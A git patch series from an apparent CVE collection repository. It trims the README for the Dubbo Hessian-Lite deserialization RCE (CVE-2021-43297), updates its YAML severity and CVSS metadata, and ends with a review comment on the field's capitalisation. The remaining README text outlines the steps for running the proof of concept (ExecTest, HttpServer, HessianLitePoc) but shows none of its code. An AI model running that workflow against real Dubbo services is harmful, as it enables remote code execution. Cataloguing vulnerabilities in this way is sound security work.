@@ -1,167 +1,5 @@ 漏洞描述 Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 -Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 -环境安装和Poc运行 - - 首先下载zookeeper - -wget http://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz -tar zxvf zookeeper-3.3.3.tar.gz -cd zookeeper-3.3.3 -cp conf/zoo_sample.cfg conf/zoo.cfg - - 配置 - -vim conf/zoo.cfg -# The number of milliseconds of each tick -tickTime=2000 -# The number of ticks that the initial -# synchronization phase can take -initLimit=10 -# The number of ticks that can pass between -# sending a request and getting an acknowledgement -syncLimit=5 -# the directory where the snapshot is stored. -dataDir=/绝对路径/zookeeper-3.3.3/data -# the port at which the clients will connect -clientPort=2181 - - 修改绝对路径,在data目录下放置一个myid文件 - -mkdir data -touch data/myid - - 启动zookeeper - -cd /private/var/tmp/zookeeper-3.3.3/bin -./zkServer.sh start - - 安装dubbo-samples-api - -git clone https://github.com/apache/dubbo-samples.git -cd dubbo-samples/dubbo-samples-api - - 修改dubbo-samples/dubbo-samples-api/pom.xml - - - - 4.0.0 - - org.example - dubbomytest - pom - 1.0-SNAPSHOT - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - - - - 1.8 - 1.8 - 2.7.6 - 4.12 - 0.30.0 - 1.2.0 - 3.7.0 - 2.21.0 - ${project.artifactId}:${dubbo.version} - openjdk:8 - 20880 - 2181 - org.apache.dubbo.samples.provider.Application - - - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - - org.apache.dubbo - dubbo-dependencies-zookeeper - 2.7.3 - pom - - - org.apache.xbean - xbean-naming - 4.15 - - - junit - junit - ${junit.version} - test - - - - - - - xbean包 - -provider端和本地都需要安装,依赖如下 - - - org.apache.xbean - xbean-naming - 4.15 - - - 编译启动 - -IDEA中添加dubbo-samples-api,注意修改zookeeper和dubbo的端口,另外在Application.java中修改代码: - -service.setRegistry(new RegistryConfig("zookeeper://" + zookeeperHost + ":" + zookeeperPort+"/?timeout=250000")); - -防止高版本dubbo连接zookeeper过慢而连接失败 - 
-在idea里面启动dubbo-samples-api中的Application.java - -启动后输出dubbo service started即表示dubbo已启动 - - 运行poc 本地添加依赖: - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-dependencies-zookeeper - 2.7.3 - pom - - - com.caucho - hessian - 4.0.51 - - +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file -- Gitee From 240c4146b1efdaa4c1c59d2fefbc2e20ec145057 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 07:24:47 +0000 Subject: [PATCH 20/20] update cve/apache-Dubbo/yaml/CVE-2021-43297.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/yaml/CVE-2021-43297.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml index 84eb42aa..1ba752b3 100644 --- a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml @@ -2,7 +2,7 @@ id: CVE-2021-43297 source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 info: name: Dubbo是一个高性能优秀的服务框架。 - severity: high + severity: CRITICAL description: | Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 scope-of-influence: @@ -11,8 +11,8 @@ info: - https://help.aliyun.com/document_detail/390193.html - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-43297 cwe-id: CWE-502 cnvd-id: None -- Gitee
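Review bot: `severity: CRITICAL` in the first hunk of the yaml update is the only upper-case value in the file — the `high` it replaces and every other field are lower case — and anything that filters this list by severity will treat `CRITICAL` and `critical` as different strings; if the other entries in the collection use lower case (not visible here), `severity: critical` keeps the field uniform. The second hunk's vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` is consistent with the 9.8 score it is paired with, so that correction reads right.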